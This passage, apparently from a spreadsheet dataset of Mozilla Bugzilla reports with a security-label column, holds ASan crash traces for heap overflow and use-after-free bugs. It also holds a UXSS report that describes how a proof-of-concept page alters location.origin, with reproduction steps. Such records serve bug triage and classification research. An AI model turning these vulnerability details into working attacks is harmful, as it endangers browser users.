      <c r="W4222" t="inlineStr">
        <is>
          <t>Created attachment 633493
Testcase
Reproduces on trunk
=================================================================
==32187== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f9aecc43f3c at pc 0x7f9b1682427b bp 0x7fffc335c370 sp 0x7fffc335c368
READ of size 4 at 0x7f9aecc43f3c thread T0
    #0 0x7f9b1682427b in ElementAnimations::EnsureStyleRuleFor(mozilla::TimeStamp, InfallibleTArray&lt;nsAnimationManager::AnimationEventInfo&gt;&amp;) firefox/src/layout/style/nsAnimationManager.cpp:274
    #1 0x7f9b1682a9f9 in nsAnimationManager::CheckAnimationRule(nsStyleContext*, mozilla::dom::Element*) firefox/src/layout/style/nsAnimationManager.cpp:518
    #2 0x7f9b16d378d3 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, bool, bool, nsIAtom*, nsCSSPseudoElements::Type, bool, mozilla::dom::Element*) firefox/src/layout/style/nsStyleSet.cpp:618
    #3 0x7f9b16d3f06d in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) firefox/src/layout/style/nsStyleSet.cpp:953
    #4 0x7f9b15aa8e90 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4546
    #5 0x7f9b15aa88ea in nsCSSFrameConstructor::ResolveStyleContext(nsIFrame*, nsIContent*, nsFrameConstructorState*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4533
    #6 0x7f9b15aaea7b in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsIFrame*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4986
    #7 0x7f9b15ad1c98 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6552
    #8 0x7f9b15ac930f in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6244
    #9 0x7f9b15ac9435 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6256
    #10 0x7f9b15ad3a1b in nsCSSFrameConstructor::CreateNeededFrames() firefox/src/layout/base/nsCSSFrameConstructor.cpp:6270
    #11 0x7f9b15ee3fab in PresShell::FlushPendingNotifications(mozFlushType) firefox/src/layout/base/nsPresShell.cpp:3813
    #12 0x7f9b177360fe in nsDocument::FlushPendingNotifications(mozFlushType) firefox/src/content/base/src/nsDocument.cpp:6297
    #13 0x7f9b1d6052a4 in nsDocLoader::DocLoaderIsEmpty(bool) firefox/src/uriloader/base/nsDocLoader.cpp:775
    #14 0x7f9b1d609c1c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/uriloader/base/nsDocLoader.cpp:704
    #15 0x7f9b1d60b76d in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/modules/zlib/src/inffast.c:0
    #16 0x7f9b146f7669 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/netwerk/base/src/nsLoadGroup.cpp:698
    #17 0x7f9b1774a9a4 in nsDocument::DoUnblockOnload() firefox/src/content/base/src/nsDocument.cpp:7166
    #18 0x7f9b1774a431 in nsDocument::UnblockOnload(bool) firefox/src/content/base/src/nsDocument.cpp:7109
    #19 0x7f9b176fc967 in nsDocument::DispatchContentLoadedEvents() firefox/src/content/base/src/nsDocument.cpp:4180
    #20 0x7f9b177bbe49 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() firefox/src/../../../dist/include/nsThreadUtils.h:349
    #21 0x7f9b20b38463 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #22 0x7f9b207c7a0d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:216
    #23 0x7f9b1d9ba5a6 in nsXULWindow::ShowModal() firefox/src/xpfe/appshell/src/nsXULWindow.cpp:378
    #24 0x7f9b1d99d522 in nsContentTreeOwner::ShowAsModal() firefox/src/xpfe/appshell/src/nsContentTreeOwner.cpp:529
    #25 0x7f9b1d99d69c in non-virtual thunk to nsContentTreeOwner::ShowAsModal() firefox/src/modules/zlib/src/inffast.c:0
    #26 0x7f9b1d7c5844 in nsWindowWatcher::OpenWindowJSInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, nsIArray*, bool, nsIDOMWindow**) firefox/src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:1000
    #27 0x7f9b1d7bbe21 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) firefox/src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:381
    #28 0x7f9b20c36dea in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #29 0x7f9b1c5c3b87 in CallMethodHelper::Invoke() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:3107
    #30 0x7f9b1c62beef in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1500
    #31 0x7f9b25e1c23d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:395
    #32 0x7f9b25d8ff1b in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2435
    #33 0x7f9b25d15317 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:267
    #34 0x7f9b25e1c65f in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) firefox/src/js/src/jsinterp.cpp:322
    #35 0x7f9b257d8090 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/src/js/src/jsinterp.h:100
    #36 0x7f9b25e2178d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) firefox/src/js/src/jsinterp.cpp:354
    #37 0x7f9b25682459 in JS_CallFunctionValue firefox/src/js/src/jsapi.cpp:5490
    #38 0x7f9b1c571f81 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1475
    #39 0x7f9b1c523198 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/src/js/xpconnect/src/XPCWrappedJS.cpp:579
    #40 0x7f9b20c3c9a0 in PrepareAndDispatch firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #41 0x7f9b20c3a137 in SharedStub firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #42 0x7f9b20c36dea in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #43 0x7f9b1c5c3b87 in CallMethodHelper::Invoke() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:3107
    #44 0x7f9b1c62beef in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1500
    #45 0x7f9b25e1c23d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:395
    #46 0x7f9b25d8ff1b in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2435
    #47 0x7f9b25d15317 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:267
    #48 0x7f9b25e1c65f in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) firefox/src/js/src/jsinterp.cpp:322
    #49 0x7f9b257d8090 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/src/js/src/jsinterp.h:100
    #50 0x7f9b25ad94f4 in js::CallOrConstructBoundFunction(JSContext*, unsigned int, JS::Value*) firefox/src/js/src/jsfun.cpp:862
    #51 0x7f9b25e1c23d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:395
    #52 0x7f9b257d8090 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/src/js/src/jsinterp.h:100
    #53 0x7f9b25e2178d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) firefox/src/js/src/jsinterp.cpp:354
    #54 0x7f9b25682459 in JS_CallFunctionValue firefox/src/js/src/jsapi.cpp:5490
    #55 0x7f9b1c571f81 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1475
    #56 0x7f9b1c523198 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/src/js/xpconnect/src/XPCWrappedJS.cpp:579
    #57 0x7f9b20c3c9a0 in PrepareAndDispatch firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #58 0x7f9b20c3a137 in SharedStub firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #59 0x7f9b20b38463 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #60 0x7f9b207c7a0d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:216
    #61 0x7f9b1f92b626 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #62 0x7f9b20de848a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #63 0x7f9b20de82d3 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
0x7f9aecc43f3c is located 4 bytes to the right of 184-byte region [0x7f9aecc43e80,0x7f9aecc43f38)
allocated by thread T0 here:
    #0 0x4a33e2 in malloc ??:0
    #1 0x7f9b2d36b737 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f9b146d7483 in nsTArrayInfallibleAllocator::Malloc(unsigned long) firefox/src/../../dist/include/nsTArray.h:56
    #3 0x7f9b154e96d8 in nsTArray_base&lt;nsTArrayInfallibleAllocator&gt;::EnsureCapacity(unsigned int, unsigned int) firefox/src/../../dist/include/nsTArray-inl.h:119
    #4 0x7f9b16840a4d in nsTArray&lt;AnimationPropertySegment, nsTArrayInfallibleAllocator&gt;::AppendElements(unsigned int) firefox/src/../../dist/include/nsTArray.h:891
    #5 0x7f9b16835ff8 in nsTArray&lt;AnimationPropertySegment, nsTArrayInfallibleAllocator&gt;::AppendElement() firefox/src/../../dist/include/nsTArray.h:906
    #6 0x7f9b16834e62 in nsAnimationManager::BuildSegment(InfallibleTArray&lt;AnimationPropertySegment&gt;&amp;, nsCSSProperty, nsAnimation const&amp;, float, nsStyleContext*, mozilla::css::Declaration*, float, nsStyleContext*) firefox/src/layout/style/nsAnimationManager.cpp:805
    #7 0x7f9b1682ea72 in nsAnimationManager::BuildAnimations(nsStyleContext*, InfallibleTArray&lt;ElementAnimation&gt;&amp;) firefox/src/layout/style/nsAnimationManager.cpp:746
    #8 0x7f9b16829a02 in nsAnimationManager::CheckAnimationRule(nsStyleContext*, mozilla::dom::Element*) firefox/src/layout/style/nsAnimationManager.cpp:442
    #9 0x7f9b16d378d3 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, bool, bool, nsIAtom*, nsCSSPseudoElements::Type, bool, mozilla::dom::Element*) firefox/src/layout/style/nsStyleSet.cpp:618
    #10 0x7f9b16d3f06d in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) firefox/src/layout/style/nsStyleSet.cpp:953
    #11 0x7f9b15aa8e90 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4546
    #12 0x7f9b15aa88ea in nsCSSFrameConstructor::ResolveStyleContext(nsIFrame*, nsIContent*, nsFrameConstructorState*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4533
    #13 0x7f9b15aaea7b in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsIFrame*, nsCSSFrameConstructor::FrameConstructionItemList&amp;) firefox/src/layout/base/nsCSSFrameConstructor.cpp:4986
    #14 0x7f9b15ad1c98 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6552
    #15 0x7f9b15ac930f in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6244
    #16 0x7f9b15ac9435 in nsCSSFrameConstructor::CreateNeededFrames(nsIContent*) firefox/src/layout/base/nsCSSFrameConstructor.cpp:6256
    #17 0x7f9b15ad3a1b in nsCSSFrameConstructor::CreateNeededFrames() firefox/src/layout/base/nsCSSFrameConstructor.cpp:6270
    #18 0x7f9b15ee3fab in PresShell::FlushPendingNotifications(mozFlushType) firefox/src/layout/base/nsPresShell.cpp:3813
    #19 0x7f9b177360fe in nsDocument::FlushPendingNotifications(mozFlushType) firefox/src/content/base/src/nsDocument.cpp:6297
    #20 0x7f9b1d6052a4 in nsDocLoader::DocLoaderIsEmpty(bool) firefox/src/uriloader/base/nsDocLoader.cpp:775
    #21 0x7f9b1d609c1c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/uriloader/base/nsDocLoader.cpp:704
    #22 0x7f9b1d60b76d in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/src/modules/zlib/src/inffast.c:0
==32187== ABORTING
Stats: 148M malloced (160M for red zones) by 338879 calls
Stats: 44M realloced by 18848 calls
Stats: 111M freed by 216201 calls
Stats: 0M really freed by 0 calls
Stats: 340M (87089 full pages) mmaped in 85 calls
  mmaps   by size class: 8:262128; 9:49146; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:512; 17:128; 18:160; 19:56; 20:16;
  mallocs by size class: 8:254257; 9:45545; 10:15976; 11:16377; 12:2361; 13:1796; 14:1413; 15:319; 16:512; 17:111; 18:149; 19:49; 20:14;
  frees   by size class: 8:150107; 9:35624; 10:12657; 11:13226; 12:1528; 13:913; 14:1224; 15:268; 16:443; 17:97; 18:57; 19:46; 20:11;
  rfrees  by size class:
Stats: malloc large: 323 small slow: 1782
Shadow byte and word:
  0x1ff35d9887e7: fb
  0x1ff35d9887e0: 00 00 00 00 00 00 00 fb
More shadow bytes:
  0x1ff35d9887c0: fa fa fa fa fa fa fa fa
  0x1ff35d9887c8: fa fa fa fa fa fa fa fa
  0x1ff35d9887d0: 00 00 00 00 00 00 00 00
  0x1ff35d9887d8: 00 00 00 00 00 00 00 00
=&gt;0x1ff35d9887e0: 00 00 00 00 00 00 00 fb
  0x1ff35d9887e8: fb fb fb fb fb fb fb fb
  0x1ff35d9887f0: fa fa fa fa fa fa fa fa
  0x1ff35d9887f8: fa fa fa fa fa fa fa fa
  0x1ff35d988800: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X4222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4223">
      <c r="A4223" t="n">
        <v>580452</v>
      </c>
      <c r="B4223" t="inlineStr">
        <is>
          <t>2010-07-20 17:00:18 -0700</t>
        </is>
      </c>
      <c r="C4223" t="inlineStr">
        <is>
          <t>Bugmail for new security bugs is not being sent to appropriate contact addresses</t>
        </is>
      </c>
      <c r="D4223" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E4223" t="n">
        <v>1</v>
      </c>
      <c r="F4223" t="n">
        <v>1</v>
      </c>
      <c r="G4223" t="n">
        <v>7</v>
      </c>
      <c r="H4223" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4223" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4223" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4223" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4223" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4223" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4223" t="inlineStr"/>
      <c r="Q4223" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4223" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4223" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4223" t="n">
        <v>1</v>
      </c>
      <c r="U4223" t="n">
        <v>0</v>
      </c>
      <c r="V4223" t="n">
        <v>6</v>
      </c>
      <c r="W4223" t="inlineStr">
        <is>
          <t>Since the bmo upgrade, any new bugs filed directly in one of the security groups aren't getting the appropriate custom contact cc'd. For example, if somebody files a new Firefox security bug, security@mozilla.org should be cc'd on that initial filing. However, that isn't happening right now, which is causing problems. Need to fix this ASAP.</t>
        </is>
      </c>
      <c r="X4223" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4224">
      <c r="A4224" t="n">
        <v>871343</v>
      </c>
      <c r="B4224" t="inlineStr">
        <is>
          <t>2013-05-12 18:35:53 -0700</t>
        </is>
      </c>
      <c r="C4224" t="inlineStr">
        <is>
          <t>[GPS] Here map Power Consumption Issue</t>
        </is>
      </c>
      <c r="D4224" t="inlineStr">
        <is>
          <t>2019-02-15 06:33:38 -0800</t>
        </is>
      </c>
      <c r="E4224" t="n">
        <v>1</v>
      </c>
      <c r="F4224" t="n">
        <v>1</v>
      </c>
      <c r="G4224" t="n">
        <v>6</v>
      </c>
      <c r="H4224" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4224" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J4224" t="inlineStr">
        <is>
          <t>Preinstalled B2G Apps</t>
        </is>
      </c>
      <c r="K4224" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4224" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4224" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4224" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4224" t="inlineStr">
        <is>
          <t>[c=power p=] [apps watch list1] [TD-9512]</t>
        </is>
      </c>
      <c r="Q4224" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4224" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4224" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4224" t="n">
        <v>1</v>
      </c>
      <c r="U4224" t="n">
        <v>0</v>
      </c>
      <c r="V4224" t="n">
        <v>59</v>
      </c>
      <c r="W4224" t="inlineStr">
        <is>
          <t>Current, Here map Scenario is as the following 
So, We concerned power consumption issue.
step1&gt; execute HERE Map App
step2&gt; press home button -&gt; HERE Map App performs long-running operations in the background and does not provide a user interface.
step3&gt; It can cause Power Consumption issue.
We think that this issue is very critical and fixed.
So, We propose this scenario as like Google Map.
case_1&gt; Here Map : Map Mode
  step1&gt; execute HERE Map App - Map Mode
  step2&gt; press home button
  step3&gt; stop GPS engine : HERE Map App doesn't perform long-running operations in the background
case_2&gt; Here Map : Navigation mode
  step1&gt; execute HERE Map App - Navigation Mode
  step2&gt; press home button
  step3&gt; runnning GPS engine for navigation guide(same current scenario)
Could you modify Here map like above scenario? 
And let me know target date if possible.
Thanks</t>
        </is>
      </c>
      <c r="X4224" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4225">
      <c r="A4225" t="n">
        <v>1730120</v>
      </c>
      <c r="B4225" t="inlineStr">
        <is>
          <t>2021-09-10 02:31:58 -0700</t>
        </is>
      </c>
      <c r="C4225" t="inlineStr">
        <is>
          <t>UXSS: location.origin is changed (port/host)</t>
        </is>
      </c>
      <c r="D4225" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:29 -0700</t>
        </is>
      </c>
      <c r="E4225" t="n">
        <v>1</v>
      </c>
      <c r="F4225" t="n">
        <v>1</v>
      </c>
      <c r="G4225" t="n">
        <v>3</v>
      </c>
      <c r="H4225" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4225" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4225" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4225" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4225" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4225" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][sec-survey][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q4225" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4225" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4225" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T4225" t="n">
        <v>1</v>
      </c>
      <c r="U4225" t="n">
        <v>0</v>
      </c>
      <c r="V4225" t="n">
        <v>47</v>
      </c>
      <c r="W4225" t="inlineStr">
        <is>
          <t>Firefox version: firefox-91.0b9 
OS: Ubuntu 18.04.1
There is a console.log printing location.origin on poc.html #9(`console.log(location.origin);`).
If you turn on the `devtools.console.stdout.content` setting and run firefox, you can see that `location.origin` is changed.
The part to change the port or host of origin is line 34 and 35 in poc.html.
```
v96.port = 1234;
```
It seems that changing the host does not work well, but it is possible to change it to something else arbitrarily.
- reproduce 
host poc.html at `http://127.0.0.1:7000/poc.html` then
```
~/firefox/firefox-91.0b9/firefox --headless http://127.0.0.1:7000/poc.html 
```
result is here.
```
*** You are running in headless mode.
[GFX1-]: glxtest: Unable to open a connection to the X server
[GFX1-]: glxtest: libEGL initialize failed
[GFX1-]: RenderCompositorSWGL failed mapping default framebuffer, no dt
console.log: "http://127.0.0.1:7000"
console.log: "http://127.0.0.1:7000"
console.log: "http://127.0.0.1:7000"
console.log: "http://127.0.0.1:7000"
console.log: "http://127.0.0.1:7000"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
console.log: "http://127.0.0.1:1234"
```
- rr log (rr_log.txt)
```
rr record ~/firefox/firefox-91.0b9/firefox --headless http://127.0.0.1:7000/poc.html
rr -M replay -a | tee rr_log.txt
```
```
[rr 27391 1683]*** You are running in headless mode.
[rr 27391 4310][GFX1-]: glxtest: Unable to open a connection to the X server
[rr 27391 4314][GFX1-]: glxtest: libEGL initialize failed
[rr 27391 17889][GFX1-]: RenderCompositorSWGL failed mapping default framebuffer, no dt
[rr 27524 26611]console.log: "http://127.0.0.1:7000"
[rr 27524 28826]console.log: "http://127.0.0.1:7000"
[rr 27524 30135]console.log: "http://127.0.0.1:7000"
[rr 27524 32311]console.log: "http://127.0.0.1:7000"
[rr 27524 32989]console.log: "http://127.0.0.1:7000"
[rr 27524 35930]console.log: "http://127.0.0.1:1234"
[rr 27524 36783]console.log: "http://127.0.0.1:1234"
[rr 27524 37772]console.log: "http://127.0.0.1:1234"
[rr 27524 38782]console.log: "http://127.0.0.1:1234"
[rr 27524 39478]console.log: "http://127.0.0.1:1234"
[rr 27524 40252]console.log: "http://127.0.0.1:1234"
[rr 27524 40887]console.log: "http://127.0.0.1:1234"
```</t>
        </is>
      </c>
      <c r="X4225" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4226">
      <c r="A4226" t="n">
        <v>989210</v>
      </c>
      <c r="B4226" t="inlineStr">
        <is>
          <t>2014-03-27 23:23:52 -0700</t>
        </is>
      </c>
      <c r="C4226" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::TextTrack::AddCue</t>
        </is>
      </c>
      <c r="D4226" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:24 -0700</t>
        </is>
      </c>
      <c r="E4226" t="n">
        <v>1</v>
      </c>
      <c r="F4226" t="n">
        <v>1</v>
      </c>
      <c r="G4226" t="n">
        <v>3</v>
      </c>
      <c r="H4226" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4226" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4226" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4226" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4226" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4226" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4226" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4226" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q4226" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4226" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4226" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4226" t="n">
        <v>1</v>
      </c>
      <c r="U4226" t="n">
        <v>0</v>
      </c>
      <c r="V4226" t="n">
        <v>23</v>
      </c>
      <c r="W4226" t="inlineStr">
        <is>
          <t>Created attachment 8398356
Testcase
Run test.html from archive. Load it over http and firefox with fuzzPriv extensions. Testcase has some flakiness, looks like some timing factor is involved with vtt file load.
&gt;==22711==ERROR: AddressSanitizer: heap-use-after-free on address 0x6160001fd678 at pc 0x7f33ab37c6dd bp 0x7fff4f7478c0 sp 0x7fff4f7478b8
&gt;READ of size 8 at 0x6160001fd678 thread T0
&gt;    #0 0x7f33ab37c6dc in get objdir-ff-asan/content/media/../../dist/include/nsAutoPtr.h:1039
&gt;    #1 0x7f33ab37c6dc in operator mozilla::dom::TextTrackManager * objdir-ff-asan/content/media/../../dist/include/nsAutoPtr.h:1052
&gt;    #2 0x7f33ab37c6dc in AddCue objdir-ff-asan/content/media/../../dist/include/mozilla/dom/HTMLMediaElement.h:538
&gt;    #3 0x7f33ab37c6dc in mozilla::dom::TextTrack::AddCue(mozilla::dom::TextTrackCue&amp;) content/media/TextTrack.cpp:115
&gt;    #4 0x7f33ab39d67d in mozilla::dom::WebVTTListener::OnCue(JS::Handle&lt;JS::Value&gt;, JSContext*) content/media/WebVTTListener.cpp:169
&gt;    #5 0x7f33a77e9921 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
&gt;    #6 0x7f33aa24f1d7 in Invoke js/xpconnect/src/XPCWrappedNative.cpp:2407
&gt;    #7 0x7f33aa24f1d7 in CallMethodHelper js/xpconnect/src/XPCWrappedNative.cpp:1748
&gt;    #8 0x7f33aa24f1d7 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:1715
&gt;    #9 0x7f33aa25523e in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1282
&gt;    #10 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #11 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #12 0x7f33aeab80ae in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:532
&gt;    #13 0x7f33ae897244 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:465
